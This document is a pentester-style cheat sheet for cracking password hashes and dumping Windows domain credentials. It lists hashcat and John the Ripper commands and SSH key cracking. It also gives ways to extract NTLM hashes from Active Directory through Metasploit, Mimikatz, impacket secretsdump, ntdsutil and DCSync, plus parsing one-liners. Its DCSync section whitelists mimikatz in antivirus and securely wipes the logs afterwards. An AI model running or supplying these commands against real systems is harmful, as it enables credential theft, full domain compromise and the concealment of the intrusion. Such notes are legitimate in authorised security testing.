Password Cracking

Hash identifier

hash-identifier

CEWL

cewl <domain> -m 6 -w <out>

JtR

john --format=md5crypt unshadowed
auxiliary/analyze/jtr_crack_fast

kerberoasting

john <krb.txt> --wordlist=</usr/share/wordlists/rockyou.txt>

Hashcat and Hashes

Hashcat SHA512 $6$ shadow file

hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

Hashcat MD5 $1$ shadow file

hashcat -m 500 -a 0 hash.txt rockyou.txt --username

Hashcat MD5 Apache webdav file

hashcat -m 1600 -a 0 hash.txt rockyou.txt

Hashcat SHA1

hashcat -m 100 -a 0 hash.txt rockyou.txt

Hashcat Wordpress

hashcat -m 400 -a 0 hash.txt rockyou.txt

Hashcat Kerberoasting

hashcat -m 13100 -a 0 hash.txt rockyou.txt

Crack SSH private key

Proc-Type: 4,ENCRYPTED

/opt/ssh2john.py id_rsa > id_john
john id_john --wordlist=</usr/share/wordlists/rockyou.txt>

Dump NTLM passwords

use windows/gather/credentials/domain_hashdump

Alternatives methods

use auxiliary/admin/smb/psexec_ntdsgrab
Hashdump / smarthashdump (unsafe for big AD)

Mimikatz Module:
lsadump::lsa /inject [/name:krbtgt] (unsafe)

Impacket

impacket-secretsdump <fqdn_domain>/<da_account>:'<password>'@<DC_ip> -just-dc

Ntdutil (Need a copy of SAM and SYSTEM too)

ntdsutil 
activate instance ntdsqifm
create full C:\ntdsutil
quit
quit

Dump

./adXtract.sh /root/ntds.dit /root/SYSTEM <projectname>

NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

Parsing

From Cobalt Strike export

cat credentials.txt | grep ":::" | grep -i <fqdn_domain> | awk -F "\\" '{print $2}' | sed 's/:::/:/' | sed 's/::://' > <fqdn_domain>.hashes

From impacket-secretdump

grep '.*:.*:.*:.*:::' <impacket.hashes> | cut -d ':' -f1,4 | grep -v '\$' > <domain.hashes>

From Metasploit

db_export -f pwdump <mission.pwdump>
grep '.*:.*:.*:.*:::' mission.pwdump > mission.hashes

From ntds.dit + SYSTEM

secretsdump.py -ntds <ntds.dit> -system <SYSTEM> LOCAL | grep '.*:.*:.*:.*:::' | cut -d ":" -f 1,4 > /tmp/ntds.hash

git clone https://github.com/HarmJ0y/ImpDump /opt/Impdump
cd /opt/Impdump
chmod +x setup.sh
./setup.sh

/opt/Impdump/extract.sh <NTDS.dit> > /tmp/ntds.raw
/opt/Impdump/impdump.py <SYSTEM> /tmp/ntds.raw | cut -d ":" -f 1,4 > /tmp/ntds.hash

DCSync extraction method

Prerequisites

Domain Account with Replicating Directory Changes and Replicating Directory Changes All permissions. By default, this is limited to the Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups.
Being connected with this account on any Domain tied system (server or workstation), it is not necessary to be on the domain controller itself.
Access powershell on the system.
Download the latest mimikatz release.
Extract the archive and whitelist the binaries in the Antivirus/Applocker if necessary.
Download Secure Delete from sysinternals.

Extraction

Check by typing the following command and check "System Type" line.

C:\>systeminfo | findstr "System"
System Boot Time:          01-01-1970, 00:00:00
System Manufacturer:       Some manufacturer
System Model:              Some model
System Type:               x64-based PC
System Directory:          C:\WINDOWS\system32
System Locale:             fr-be;French (Belgium)

In mimikatz prompt type the following commands (one by one)

log C:\mimikatz.log
lsadump::dcsync /all /csv
exit

All remaining data should have this format userID username ntlmhash save and close the logfile.

Parsing

Parse hashes with hashcat syntax a store it in C:\ntlm.hash.

Get-Content C:\mimikatz.log | ForEach-Object { $_ -replace "\s+",":" } | ForEach-Object { $_.split(":")[1:2] -join ":" }| Out-File C:\ntlm.hash

Cleanup

Remove mimikatz (Downloaded archive, x32 and x64 folder, and all other files).
Remove the eventual Antivirus/Applocker whitelist.
Securely remove C:\mimikatz.log with sdelete.
Securely remove C:\ntlm.hash with sdelete.